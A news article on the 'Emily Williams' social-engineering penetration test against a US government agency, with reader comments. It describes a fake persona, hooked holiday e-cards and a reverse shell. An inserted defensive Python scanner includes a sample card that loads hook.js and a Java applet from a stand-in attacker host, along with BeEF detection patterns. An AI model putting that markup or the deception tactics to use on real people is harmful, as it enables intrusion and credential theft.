Government agency compromised by fake Facebook hottie

Summary: Emily Williams wasn't real, but the two hackers who created her from social media profiles got her a government job, a company laptop, VPN credentials - and compromised a government network.

Using social media profiles and a photo of a real (and consenting) woman, two hackers fooled a government employer into believing she was an employee, conning them out of a company laptop, network credentials, and more.

They used "her" Facebook and LinkedIn connections to send holiday cards that linked to an attack site, which the government employees visited, and scammed one employee into sending her a work laptop - along with network access credentials and more, such as Salesforce logins.

The researchers used the imaginary pretty girl's poisoned holiday e-cards to gain administrative rights, obtain passwords, install applications and steal documents containing sensitive information - some of which, according to the hackers, included information about state-sponsored attacks and country leaders.

Miss Emily Williams - run by her puppetmasters, security researchers Aamir Lakhani and Joseph Muniz - even convinced a security team executive to click a JavaScript exploit masquerading as a birthday card, thus compromising his laptop.

Lakhani told an audience at RSA Europe 2013 on Wednesday, October 30, "This guy had access to everything. He had the crown jewels in the system." 

Mr. Lakhani presented the team's research findings at RSA Europe in a talk titled Social Media Deception, the results of his team's sanctioned 90-day "Emily Williams" penetration test experiment on a US government agency, conducted at the end of 2012.

Lakhani declined to state which U.S. government agency was infiltrated and compromised by the fictitious Miss Williams. He told the RSA audience that his team's pre-Snowden attack was performed on a very secure agency that specializes in offensive cybersecurity and protecting secrets - one where, in previous pentests against it, only zero-day attacks had succeeded.

Mr. Lakhani explained that his team had first tried the attack with fictitious male personas, but the male characters were not successful.

He said that, in fact, the team had achieved their objective within a week of deploying the Emily Williams persona, but ran the experiment for its full 90 days to see how far it could go.

And it went pretty far.

NOTE: The research presented is real. Many people reading this are friends with Emily and probably mad at us.

We have informed anybody attacked so if you haven't heard from us, you are just social network friends with Emily. - The Social Media Deception Project: How We Created Emily Williams To Compromise Our Target

Emily Williams - the attack - was modeled on Robin Sage, another fictitious person created in 2009 to demonstrate how easily information could be obtained from US military and intelligence personnel via social networks; the Robin Sage findings were presented at Black Hat 2010 ("Getting in bed with Robin Sage"), to the anger and embarrassment of many.

Hey guys, my face is up here

Miss Williams first came into being on Facebook and LinkedIn sometime during 2011. 

The waitress who volunteered the fictitious character's photos worked at an establishment frequented by the target agency's employees - the nearby Hooters - yet no employee recognized her in person at any time during the experiment.


We found a non technical female employee from the restaurant industry (that happened to be a few blocks from our target) to volunteer pictures for Emily’s appearance.

We developed a fake social security number, residence and other areas that may be searched to make Emily seem real. We gave Emily an IT background from the University of Texas and updated her profile with a matching employment background.

Before zeroing in on the government target's employees, Lakhani and Muniz built up Miss Williams' presence on social media, netting her hundreds of connections, with only one man flagging her as suspicious.

Another man asked how Emily might know him; when the researchers answered with details taken from the man's own profile, he said he did indeed remember the imaginary girl.


Once Williams had friends, the hackers updated her Facebook and LinkedIn profiles with a just-hired status at the government target and gave her an engineering title. The attractive, imaginary young woman then connected via social media with the target's employees in Human Resources, IT Support, Engineering and executive leadership roles.

The congratulations for "her" new job rolled in.

As our target audience friend number grew, we started moving up the rank eventually capturing people from Human Resources and Engineering who would be responsible for hiring Emily if she existed.

We moved all the way up to executive leadership...

As it was near the holidays, no one questioned it when Miss Williams posted seasonal cards on Facebook directed at specific targets among her coworkers - cards they clicked, and were then silently and unknowingly pwned.

The cards, of course, were part of the hackers' deception. 

The security researchers said that they were intent on doing no harm to their targets.

They had many options for gaining access to host systems through social media. One popular option they declined to use was the Blackhole exploit kit, which delivers a malicious payload - the researchers said they "felt [Blackhole] wasn't safe for our target's systems."

Instead they used the Browser Exploitation Framework (BeEF), they said, "based on our feeling that compromising browsers was not as evil as using malware." Via the holiday card ruse, targets clicked through to a page that hooked their browser; from there they were prompted to run a signed Java applet that opened a reverse shell back to Lakhani and Muniz over an SSL connection.

Once we hooked the target, we would look for passwords and insider information to gain access to the target agency. We launched three campaigns targeting systems during Thanksgiving, Christmas and New Years.

We were able to figure out domain credentials to create an inside email address for Emily Williams, VPN passwords to gain internal access and other methods to compromise our target.
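The attack chain above comes down to an HTML "card" that pulls in a browser-hook script from an attacker-controlled host and then offers a signed Java applet. The following scanner, an added example and not the researchers' code, shows the checks a mail or web-proxy filter would apply to such a card before a user ever sees it. The trusted-host allowlist, the finding categories and both sample cards are constructed for illustration; the only real-world detail is that BeEF serves its hook script as hook.js by default, and even that is a name an attacker can change, so the external-script and applet checks are the ones that matter.

```python
"""Flag HTML e-cards that load third-party scripts or Java applets.

Added example (not from the Emily Williams project). TRUSTED_HOSTS and the
two sample cards are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the organisation serves its own content from (assumed for the example).
TRUSTED_HOSTS = {"intranet.example.gov", "cards.example.gov"}

JAVA_MIME = "application/x-java-applet"


class ECardScanner(HTMLParser):
    """Collects (severity, kind, detail) findings while parsing the markup."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def _external(self, url):
        # Relative URLs have no hostname and resolve to the sending server,
        # so only absolute URLs pointing off the allowlist count as external.
        host = urlparse(url).hostname
        return host is not None and host.lower() not in TRUSTED_HOSTS

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script" and "src" in a:
            src = a["src"]
            if self._external(src):
                self.findings.append(("high", "external-script", src))
            # BeEF's default hook file name; a renamed hook still trips the
            # external-script check above.
            if urlparse(src).path.split("/")[-1].lower() == "hook.js":
                self.findings.append(("high", "beef-hook-name", src))
        elif tag == "applet":
            self.findings.append(("high", "java-applet", a.get("archive") or a.get("code", "")))
        elif tag in ("object", "embed"):
            # Applets can also be embedded via <object>/<embed>; look for the
            # Java MIME type, a .jar archive, or a Java plug-in classid.
            is_java = (a.get("type", "").lower() == JAVA_MIME
                       or a.get("archive", "").lower().endswith(".jar")
                       or "java" in a.get("classid", "").lower())
            if is_java:
                self.findings.append(("high", "java-applet", a.get("archive") or a.get("code", "")))
        elif tag in ("iframe", "frame") and "src" in a and self._external(a["src"]):
            self.findings.append(("medium", "external-frame", a["src"]))
        elif tag == "a" and "href" in a and self._external(a["href"]):
            self.findings.append(("low", "external-link", a["href"]))


def scan_ecard(html):
    """Return the list of findings for one HTML message body."""
    parser = ECardScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


def verdict(findings):
    """Map the worst finding to a filter action."""
    severities = {sev for sev, _, _ in findings}
    if "high" in severities:
        return "block"
    if "medium" in severities:
        return "quarantine"
    if "low" in severities:
        return "warn"
    return "allow"


# Constructed sample: a card served entirely from the organisation's own hosts.
BENIGN_CARD = (
    '<html><body><img src="https://cards.example.gov/turkey.png">'
    '<p>Happy Thanksgiving!</p>'
    '<a href="https://intranet.example.gov/holidays">Holiday schedule</a>'
    '</body></html>'
)

# Constructed sample mirroring the attack: third-party hook script plus a
# signed applet pulled from the same attacker host.
HOOKED_CARD = (
    '<html><head><script src="http://cards-4u.example.net/hook.js"></script></head>'
    '<body><p>Happy Thanksgiving from Emily!</p>'
    '<applet code="Card.class" archive="http://cards-4u.example.net/card.jar" '
    'width="1" height="1"></applet>'
    '<a href="http://cards-4u.example.net/view">View your card</a>'
    '</body></html>'
)

if __name__ == "__main__":
    for name, card in (("benign", BENIGN_CARD), ("hooked", HOOKED_CARD)):
        found = scan_ecard(card)
        print(name, verdict(found), found)
```

The point of the allowlist is that a hook script does not need to look malicious: it is one `<script src>` line, and the only reliable tell is that it loads from a host the organisation does not control. The applet check matters separately because, once the browser is hooked, the signed applet is the step that turns a hooked tab into a reverse shell, so a card that carries either element should never reach a user's inbox.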

Lakhani told the RSA audience that government contractors also fell for their creation's tainted holiday treats, including employees for antivirus companies.

All the while, the team's social engineering continued.

Men working for the government agency gave the pretty girl special treatment. Some men offered to help Miss Williams at her new job by doing her a few favors; namely circumventing usual channels to get her a work laptop, and access to the organization's network.


Lakhani told RSA attendees that the level of access their creation obtained was higher than a new hire would have gotten if "she" had gone through the proper channels.

Lakhani and Muniz may have angered a number of government employees, but the pair had so much success they began to receive requests from other companies and organizations to try the same test.

In the RSA Deception talk this week Lakhani said, "So we also did the same type of penetration test for very large financial institutions like banks and credit card companies, healthcare organizations and other firms, and the results were almost exactly the same."


Lakhani cautioned RSA Europe attendees, "Every time we include social engineering in our penetration tests we have a hundred percent success rate."

The talk concluded with a number of recommendations for companies to follow if they want to avoid falling victim to an Emily Williams attack. Some of these are detailed in the team's post, How To Educate Your Employees About Social Engineering.

But, he opined, social engineering trainings aren't ever going to be enough if employees don't have an understanding of constant situational awareness.

Topics: Security, Government US, Malware

Talkback

19 comments
  • hehehe

    Man's greatest weakness in any age
    ArcaneAce
    • man's greatest...

      ... is man himself.

      Sorry, you seem to have forgotten to conclude that sentence you started. :)
      TG2
  • I think having more women...

    ...in these businesses might be good, as women are not generally inclined to give other beautiful women preferential treatment
    nessrapp
    • Wow

      U R an idiot
      Panwo1@...
    • Legend has it ..

      .. during the cold war, the US sent beautiful women to the USSR to seduce politicians and scientists, in order to learn their secrets. The USSR on the other hand, sent handsome men to the US to seduce the secretaries and research assistants, which turned out to be orders of magnitude more successful.
      px43
  • Honeytrap

    A new twist on an old spy trick. And using nothing more than a picture of a pretty woman. It's a sad state of affairs for us men.
    MajorlyCool
    • Plus the "Biological imperative"

      It is said (usually by women) that many (most?) men -- ages about 15 to about the 30s -- have an undiagnosed case of what I call "reflex hypotensive priapism."

      This differs from "hypotensive syncope" in that, with the latter, you stand up suddenly, the blood rushes out of your brain and you faint. Whereas with hypotensive priapism, the blood rushes out of your head and is directed into the penis, which makes that organ snap to attention while the brain floods with testosterone and the "Biological imperative" kicks in.

      Any questions? ;)
      RangerJimK
  • Would it work from foreigners?

    Considering that it is SOCIAL engineering, I'd be curious to know whether the techniques would work if the persons attempting it were foreigners outside the U.S. even if they had attended college in the U.S.

    For instance, we all know there are certain tipoffs to Nigerian 419 scams such as all caps in the subject line and the sender is "Mr. [whoever]" or "Mrs. [whoever]"

    I'm reminded of the Brad Pitt film Inglorious B*st*rds where a group infiltrates Nazi Germany and they have one guy who speaks fluent German he learned from his parents and a Nazi officer is suspicious but not sure until that person orders "Three beers" and holds up his index, middle and ring fingers whereas Germans would hold up their thumb, index and middle fingers.
    Rick_R
  • "Emily ... a 28-year-old MIT graduate with 10 years experience"

    http://www.pcworld.com/article/2059940/fake-social-media-id-duped-securityaware-it-guys.html

    One wonders if that experience included working as a waitress (pun intended)?

    At some point, one would think that 'Emily' would have been referred to Human Resources where a validation and background check would have been arranged. Or has social media made HR obsolete?

    P.S. Ms. Blue, I'm shocked and saddened that they did not ask to use one of your pics. :(
    Rabid Howler Monkey
    • The function of HR

      has always been to protect the decision makers from the hordes of undesirables so they can make their decisions arbitrarily and unilaterally.
      Kurt Engelhart
  • Clean systems

    " even convinced a security team executive to click a javascript exploit masquerading as a birthday card, thus compromising his laptop."

    I don't understand why critical functions, be they master passwords or critical industrial system controls, are not running on non-consumer hardware on an spartan non-consumer OS; and for that matter, not relying on the consumer Internet as a resource. No system is impenetrable, but using "secure" equipment to befriend unknown folks on Facebook seems like a parody.

    "Beware of pretty faces that you find..."
    guiduk
  • Now that computers are ever faster

    Now that computers are ever faster, more powerful, etc.. I would expect more sandboxing to occur for security sake.

    "want to facebook? only use *this* resource for facebook" ... abstinence has never worked. Understanding this, and making a way for people to more easily express themselves, while keeping a better measure of security, needs to be the goal.
    TG2
  • Emily a Hacker's Dream ?

    Why can't she now be used for something more useful to American citizens, who are continuously spied upon by the NSA by the growing nose of Obama! We need another Mata Hari like a fictional Emily to expose all the lies or half-explained Fascist truths that are replacing our much-loved Democracy with double speak and fooling our citizens, and the intelligence of the Media, who have a responsibility to report information to citizens who are being misled and may be harmed. Their duty is to report FACTS! No bias, with no payoffs or favoritism. The press should honor the citizens, especially in times of a government that is not following our best interests and has selfish GREED to be exposed, as well as crime and cover-ups. We also need groups like Anonymous and other patrolling free-speech and honorable hackers to help protect the inalienable rights belonging to every human. This Emily could help us find loopholes everywhere and expose corruption anonymously with documented proof through the World Press.
    ApheliaDawn
  • Other Lessons

    We often hear that young women do not pursue careers in IT because of discouragement by men, creation of a hostile environment, and so on. That is not entirely true, as this exercise shows.
    kjn9
  • Paranoia

    As an IT business owner, I regularly find myself accused of being "paranoid" by friends and family. When I suggest that something like this - 3**xWrx78-39yU - should be a normal password (in a password manager), I start getting sarcastic comments and lighthearted ribbing. When I attempt to teach clients (SMBs) about security best practices, the normal reaction is "eyes glazed over". Even my own employees, whom I can supposedly tell to do things right, give me pushback. (In their defense, they usually improve once they fully understand the reasoning.) All this, however, illustrates the virtual impossibility of training the normal workforce to become "situationally aware" enough to repel a well-done social engineering hack. Heck... I'm a guy, and I know about this stuff!... (follow me?)

    The answer is incentives. For instance, put a "security bounty" on every employee's head. Give them a bonus, which they get to keep at the end of the year PROVIDED they haven't been pwned. Tell them that actual hackers, using social engineering, will be trying to take their bonus... and that the hackers will get the bonus (and the employee won't) if they succeed. Train the employees, let them practice repelling attacks, etc. - give them the tools they need. If this sounds too adversarial, remind everyone that the internet ... is adversarial!

    Out in the "real" real world (the jungle), there is a price to be paid for lazy, uninformed inattention. It's called - death. "Hacked" isn't "killed", but hacking can lead to killing, whether financial or literal. Nevertheless, the jungle is full of life, and situational/security awareness, even to social engineering attacks, can be developed. It's just hard work.
    ClearCreek
  • Wow

    "90-day 'Emily Williams' penetration test"

    I've conducted a few of those sorts of tests myself. With varying success.
    SgtSpork
  • its a male thing...

    When Ms Emily used the words 'zip file' all the guys thought she meant something else..
    ImWatchingToo
  • "Wetware"

    As far as social engineering is concerned, you'll never do better than to exploit sexual-attraction to the opposite sex - it's hard-coded into human DNA.
    anthonymaw
  • People are people...

    ... and as such, often stupid. Maybe I should just say gullible. I won't open "greeting cards" even when they claim to be from my sister, who loves to send greeting cards. I think she finds this annoying. But better safe than sorry.

    Now, if "Emily" came to me in person, I'd probably fall for whatever scam she was running, but when an email comes (typically through a dating site) with a picture of a beautiful woman, I KNOW it's a scam, because beautiful women are not looking for guys like me.
    daniel1948x